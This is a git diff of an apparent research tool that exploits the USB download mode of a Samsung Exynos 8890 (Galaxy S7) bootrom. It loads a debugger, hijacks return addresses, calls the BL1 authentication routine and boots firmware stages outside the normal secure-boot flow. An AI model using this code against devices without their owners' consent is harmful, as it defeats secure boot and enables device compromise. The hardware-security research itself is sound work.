diff --git a/source/exploit/.vscode/launch.json b/source/exploit/.vscode/launch.json
index eeb4db5..5c86962 100644
--- a/source/exploit/.vscode/launch.json
+++ b/source/exploit/.vscode/launch.json
@@ -28,7 +28,16 @@
             "program": "exploit.py",
             "console": "integratedTerminal",
             "justMyCode": false,
-            "args": ["--boot"]
+            "args": ["--unsecure-boot"]
+        },
+        {
+            "name": "Run debugger boot",
+            "type": "debugpy",
+            "request": "launch",
+            "program": "exploit.py",
+            "console": "integratedTerminal",
+            "justMyCode": false,
+            "args": ["--debugger-boot"],
         },
         {
             "name": "Debug current file",
diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index 378b100..21c9ef3 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -86,7 +86,7 @@ class ExynosDevice():
                 sys.exit(0)
             else:
                 raise e
-
+            
         # claim usb interface
         self.handle.claimInterface(0)
         print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
@@ -98,12 +98,14 @@ class ExynosDevice():
         self.context.exit()
 
     def write(self, data):
+        """Write data to the device"""
         transferred = ctypes.c_int()
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
         assert(res == 0), "Could not perform bulk transfer"
         return res
 
     def send_empty_transfer(self):
+        """Send an empty transfer (to not actually write data)"""
         transferred = ctypes.c_int()
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
         assert(res == 0)
@@ -127,6 +129,7 @@ class ExynosDevice():
             res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
 
     def test_bug(self):
+        """Verify bug existence"""
         # Start by sending a valid packet
         # Integer overflow in the size field
         # unk + size + payload + header
@@ -147,39 +150,45 @@ class ExynosDevice():
         TODO not working
         '''
         # construct dl_data
-        dpayload = struct.pack("<II", 0, len(payload) + 8 + 2) 
+        dpayload = struct.pack("<II", 0, (len(payload) + 8 + 2)) 
         dpayload = dpayload + payload + b"\x00" * 2 # add footer
         transferred = ctypes.c_int() 
         for block in range(0, len(dpayload), BLOCK_SIZE):
             res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0)
             assert res == 0, "Error sending payload"
-        p_ok("Sended stage")
+        p_ok("Sent stage")
     
-    def unsecure_boot(self):
-        self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
-        time.sleep(2)
-        self.connect_device()
+
+    def unsecure_boot(self, exploit=False):
+        '''
+        Do a normal boot process, with or without exploit.
+        '''
+        if exploit:
+            self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
+            time.sleep(2)
+            self.connect_device()
         # self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
         self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
+        # self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
+        # self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read())
         # wait_disconnect()
         time.sleep(2)
         self.connect_device()
         self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
+        # self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
         # wait_disconnect()
         time.sleep(2)
         self.connect_device()
         self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
+        # self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
         # wait_disconnect()
         time.sleep(2)
         self.connect_device()
         self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
-        
-        # self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
-        # self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
-        # self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
-        # self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
+        # self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())        
         pass
 
+
     def exploit(self, payload: bytes):
         '''
         Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. 
@@ -234,7 +243,9 @@ class ExynosDevice():
         transferred = ctypes.c_int(0)
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
         assert res == 0, "Error sending ROP chain"
-        
+        return
+
+
     def usb_write(self, data):
         assert len(data) <= 0x200, "Data too big"
         transferred = ctypes.c_int()
@@ -243,13 +254,15 @@ class ExynosDevice():
         assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
         return transferred.value
 
+
     def usb_read(self, size):
         transferred = ctypes.c_int()
         buf = ctypes.c_buffer(b"", size)
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
         assert res == 0, f"Error receiving data {res}"
         return buf.raw[:transferred.value]
-    
+
+
     def setup_concrete_device(self, concrete_device : ConcreteDevice):
         #Setup architecture
         concrete_device.arch = QL_ARCH.ARM64
@@ -265,6 +278,7 @@ class ExynosDevice():
         #Overwrite all calls to make the concrete target function properly
         concrete_device.copy_functions()
 
+
     def usb_debug(self):
         """
         Function to debug USB behaviour. Sends and receives data in continuous flow.
@@ -291,6 +305,7 @@ class ExynosDevice():
             _recv_data()
             count += 1
 
+
     def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False):
         """
         Dumps memory from the device.
@@ -312,11 +327,6 @@ class ExynosDevice():
                 f.write(dumped)
         return dumped
 
-        # transferred = ctypes.c_int()
-        # stack_pointer = 0x02021810
-        # for block in range(0x2020000, 0x2200000, 0x200):
-        #     stack_pointer += 0x200
-        #     dumped += self.cd.memdump_region(block, 0x200)
 
     def setup_guppy_debugger(self):
         """
@@ -356,32 +366,34 @@ class ExynosDevice():
         
         _initial_run_debugger()
         _setup_debugger()
+    
+
+    def relocate_debugger(self):
+        # Seems to be cleared upon cache clearing??
+        if os.getenv("USER") == "eljakim":
+            debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
+        else:
+            try:
+                debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
+            except Exception as e:
+                print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
+                sys.exit(0)
+
+        self.cd.memwrite_region(0x020c0000, debugger_reloc)
+        self.usb_write(b"FLSH") # Flush cache
+        self.cd.restore_stack_and_jump(0x020c0000)
+        assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
+        self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
         
+
     def dumb_interact(self, dump_imems=False):
         '''
-        Room for playing around with the debugger
+        Room for playing around with the debugger on the phone.
         '''
         self.cd.arch_dbg.state.auto_sync = False
         self.cd.arch_dbg.state.auto_sync_special = False
         logger.debug('State after setting up initial debugger')
         self.cd.arch_dbg.state.print_ctx()
-        
-        def relocate_debugger():
-            # Seems to be cleared upon cache clearing??
-            if os.getenv("USER") == "eljakim":
-                debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
-            else:
-                try:
-                    debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
-                except Exception as e:
-                    print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
-                    sys.exit(0)
-
-            self.cd.memwrite_region(0x020c0000, debugger_reloc)
-            self.usb_write(b"FLSH") # Flush cache
-            self.cd.restore_stack_and_jump(0x020c0000)
-            assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
-            self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
             
         def first_debugger():
             debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
@@ -390,20 +402,24 @@ class ExynosDevice():
             assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
             self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
 
-        # relocate_debugger()
+        # self.relocate_debugger()
         DEBUGGER_ADDR = 0x2069000 #0x020c0000
 
+        ### Get whereabouts of the debugger and current processor state
         logger.debug('State after relocating debugger')
         self.cd.arch_dbg.state.print_ctx()
         
         def memdump_imem():
+            """
+            Dumps the internal memory of the device (0x2020000 - 0x2070000).
+            """
             dumped = b""
             for block in range(0x2020000, 0x2070000, 0x200):
                 # print(hex(block))
                 dumped += self.cd.memdump_region(block, 0x200)
             return dumped
         
-        AUTH_BL1 = 0x00012848
+        AUTH_BL1 = 0x00012848 # Location of the authentication function
         def auth_bl1(lr=0x2069000):
             # Load the firmware
             self.cd.arch_dbg.state.X0 = 1
@@ -413,18 +429,17 @@ class ExynosDevice():
             assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
             assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
             
-        BOOT_BL1 = 0x00019310
+        BOOT_BL1 = 0x00019310 # Location of the boot function
         def boot_bl1(lr=0x2069000):
             self.cd.arch_dbg.state.LR = lr
             self.cd.restore_stack_and_jump(BOOT_BL1)
             assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
             
-        JUMP_BL1 = 0x000002c0
+        JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
         def jump_bl1(lr):
             self.cd.arch_dbg.state.LR = lr
             self.cd.restore_stack_and_jump(JUMP_BL1)
             
-            
         # Always hijack rom_usb_download function:
         rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
         self.cd.memwrite_region(0x020200dc, p32(0x2069000))
@@ -432,7 +447,7 @@ class ExynosDevice():
         # Try loading bl1
         bl1 = open("../S7/bl1.bin", "rb").read()
         self.cd.memwrite_region(0x02021800, bl1)
-        self.usb_write(b"FLSH") # Flush cache
+        self.usb_write(b"FLSH") # Flush cache, as Frederic does
         self.cd.test_connection() 
         auth_bl1(DEBUGGER_ADDR)
         # boot_bl1(DEBUGGER_ADDR)
@@ -462,39 +477,15 @@ class ExynosDevice():
         # self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
         # self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
         
-        # Patch stupid error funciton
+        # Patch stupid error function
         # self.usb_write(b"FLSH") # Flush cache
         
         # Download next stage?
         lr = self.cd.arch_dbg.state.LR
-        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
-        
-        
-        
+        # self.cd.arch_dbg.state.LR = DEBUGGER_ADDR        
         pass
 
-        # Using keystone, look for each msr instruction (AARCH64, LE)
-    
-
-        # If wanting to modify the binary
-        # bl1 = bl1[:0x1C23] + b'\xaa' + bl1[0x1C24:]
-
-
-        imem1 = memdump_imem()
-        
-            
-        auth_bl1(0x020c0000)
-
-        # Dump memory
-        # imem2 = memdump_imem()
-        # with open("/tmp/imem1_bad.bin", "wb") as f:
-        #     f.write(imem1)
-        # with open("/tmp/imem2_bad.bin", "wb") as f:
-        #     f.write(imem2)
-        
         # Overwrite jump back to the debugger from functions encountered during jump_bl1
-        # self.cd.memwrite_region(0x02020108, p32(0x020c0000)) # Hijack some weird function, original 0x00005790
-        
         self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
         self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
         
@@ -502,8 +493,6 @@ class ExynosDevice():
             print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
             self.cd.restore_stack_and_jump(0x00000314)
 
-
-        
         jump_bl1(0x020c0000)
         def handle_weird_brom():
             while True:
@@ -517,20 +506,13 @@ class ExynosDevice():
                     pass
         handle_weird_brom()
             
-        # Parse pagetables
+        ### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
         # self.cd.jump_to(0x2069000)
         # assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
         # self.cd.fetch_special_regs()
         
-        # Address to download to
-        
-        
-        
-        
         self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
-            
-        # testfun(0x2069000)
-            
+                
         self.cd.arch_dbg.state.X0 = 1
         self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
         self.usb_read(0x200) # GiAs
@@ -538,7 +520,8 @@ class ExynosDevice():
         self.cd.arch_dbg.state.LR = 0x2069000
         self.cd.restore_stack_and_jump(0x00000314)
         pass
-
+        
+        ### UXN and PXN seem to be present over the USB stack (02021800+)
         shellcode = f"""
         ldr x0, debugger_addr
         blr x0
@@ -551,11 +534,7 @@ class ExynosDevice():
         self.cd.jump_to(0x2021800)
         pass
 
-        
-        # load bl31
-        
         # bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
-
         # # Write bl31 at 0x02021800 and authenticate
         
         auth_bl1(0x020c0000)
@@ -564,23 +543,7 @@ class ExynosDevice():
         jump_bl1(0x02021800)
         pass
 
-        # OLD
-        
-        def memdump_try():
-            self.cd.arch_dbg.state.LR = 0x020200e8
-            self.cd.restore_stack_and_jump(0x02021810)
-            stack_pointer = 0x02021810
-            dumped = b""
-            for block in range(0x2020000, 0x2200000, 0x200):
-                stack_pointer += 0x200
-                self.cd.arch_dbg.state.print_ctx()
-                print(hex(block))
-                dumped += self.cd.memdump_region(block, 0x200)
-                
-        
-            
-        
-            # self.cd.restore_stack_and_jump(0x02021810)
+        # VERY OLD
             
         #000125b4
         # self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
@@ -588,36 +551,85 @@ class ExynosDevice():
         # self.cd.restore_stack_and_jump(0x000125b4)
         
         
-        
-        auth_bl1()
-        
-        # auth_bl1()
-        jump_bl1()
-        assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
-        self.cd.arch_dbg.state.print_ctx()
-        
-        def jump_bl31():
-            self.cd.arch_dbg.state.LR = 0x2069000
-            self.cd.restore_stack_and_jump(0x02021810)
-        bl31 = open("../S7/bl31.bin", "rb").read()
+    def debugger_boot(self):
+        """
+        Boot into USB recovery mode using the debugger.
+        """
+        ### Setup debugger
+        self.setup_guppy_debugger()
 
-        self.cd.memwrite_region(0x02021800, bl31)
-        jump_bl31()
-        assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
+        self.cd.arch_dbg.state.auto_sync = False
+        self.cd.arch_dbg.state.auto_sync_special = False
+        logger.debug('State after setting up initial debugger')
         self.cd.arch_dbg.state.print_ctx()
+
+        DEBUGGER_ADDR = 0x2069000 #0x020c0000
+
+        ### Overwrite boot_usb_ra to our debugger
+        self.cd.test_connection()
+        hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
+        self.cd.memwrite_region(0x02020f60, p64(0x2069000))
+
+        ### Set link register and boot into the USB function
+        BOOT_USB_FUNCTION = 0x000064e0
+        self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
+        self.cd.restore_stack_and_jump(BOOT_USB_FUNCTION)
+        time.sleep(1)
+        self.connect_device()
+
+        # Setup jump and authentication
+        AUTH_BL1 = 0x00012848
+        def auth_bl1(lr=0x2069000):
+            # Load the firmware
+            self.cd.arch_dbg.state.X0 = 1
+            self.cd.arch_dbg.state.X1 = 1
+            self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
+            self.cd.restore_stack_and_jump(AUTH_BL1)
+            assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
+            ### Check if authentication was successful - X0 should not be 0??
+            # assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
+
+        JUMP_BL1 = 0x000002c0
+        def jump_bl1(lr):
+            self.cd.arch_dbg.state.LR = lr
+            self.cd.restore_stack_and_jump(JUMP_BL1)
+
+        # Send boot stage 1
+        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
+        # self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
         
-        # memdump_try()
-        # auth_bl1()
-        self.cd.arch_dbg.state.print_ctx()
-        
-        #authenticate it
+        assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
+        auth_bl1(DEBUGGER_ADDR)
+        time.sleep(1)
+
+        self.cd.memwrite_region(0x02020f60, hijacked_usb_ra)
+
+        self.usb_write(b"FLSH") # Flush cache
+        jump_bl1(DEBUGGER_ADDR)
+        time.sleep(2)
+        self.connect_device()
+        # self.connect_device()
+
+
+        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
+        time.sleep(2)
+        self.connect_device()
+
+        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
+        time.sleep(2)
+        self.connect_device()
+
+        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
+        time.sleep(2)
+        self.connect_device()
         pass
 
 
 if __name__ == "__main__":
     arg = argparse.ArgumentParser("Exynos exploit")
     arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
-    arg.add_argument("--boot", action="store_true", help="Unsecure boot", default=False)
+    arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
+    arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
     
     args = arg.parse_args()
     exynos = ExynosDevice()
@@ -629,13 +641,17 @@ if __name__ == "__main__":
         # exynos.usb_debug()
         sys.exit(0)
     
-    if args.boot:
+    if args.unsecure_boot:
         exynos.unsecure_boot()
         sys.exit(0)
-    
 
     stage1 = open("stage1/stage1.bin", "rb").read()
     exynos.exploit(stage1)
+
+    if args.debugger_boot:
+        exynos.debugger_boot()
+        sys.exit(0)
+
     exynos.setup_guppy_debugger()
     exynos.dumb_interact()